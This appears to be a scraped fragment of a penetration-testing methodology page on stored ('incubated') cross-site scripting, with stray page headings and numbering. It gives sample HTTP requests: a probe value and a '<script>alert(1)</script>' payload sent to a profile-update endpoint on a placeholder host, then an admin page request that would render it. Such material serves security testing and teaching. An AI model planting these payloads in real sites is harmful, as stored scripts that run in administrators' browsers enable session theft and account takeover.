Incubated Vulnerability
Check List
Methodology
Black Box
s
1
POST /profile/update HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Bio=Unk9vvN2
POST /profile/update HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
bio=<script>alert(1)</script>3
4
GET /admin/viewProfile?id=123 HTTP/1.1
Host: target.com5
6
White Box
Cheat Sheet
Last updated